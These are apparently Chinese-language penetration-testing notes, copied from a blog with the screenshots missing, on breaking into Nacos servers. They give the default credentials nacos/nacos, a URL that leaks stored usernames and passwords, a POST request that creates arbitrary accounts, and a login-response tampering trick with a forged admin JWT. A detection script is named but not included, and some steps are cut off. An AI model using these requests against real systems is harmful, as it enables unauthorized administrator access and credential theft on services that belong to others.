1 弱口令:nacos/nacos
http://ip:8848/nacos
以上网址是默认登录页面地址,如图
尝试用弱口令nacos/nacos登录。
2 账号及密码泄露
http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
访问以上地址可以获取到已有的用户名和密码,如图
3 创建任意用户
POST http://ip:8848/nacos/v1/auth/users?username=test1&password=test1
抓包将GET改成POST提交,即可创建任意用户
使用创建的test1/test1 用户成功登录
4 未授权访问
更改登录时的回包,即可直接管理员权限登录,回包内容如下:
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
将此回包更改
更改成以下内容
nacos用户成功登录
5 批量检测脚本
脚本来源:
基于Python3对Nacos相关漏洞的检测脚本编写 | Tommonkey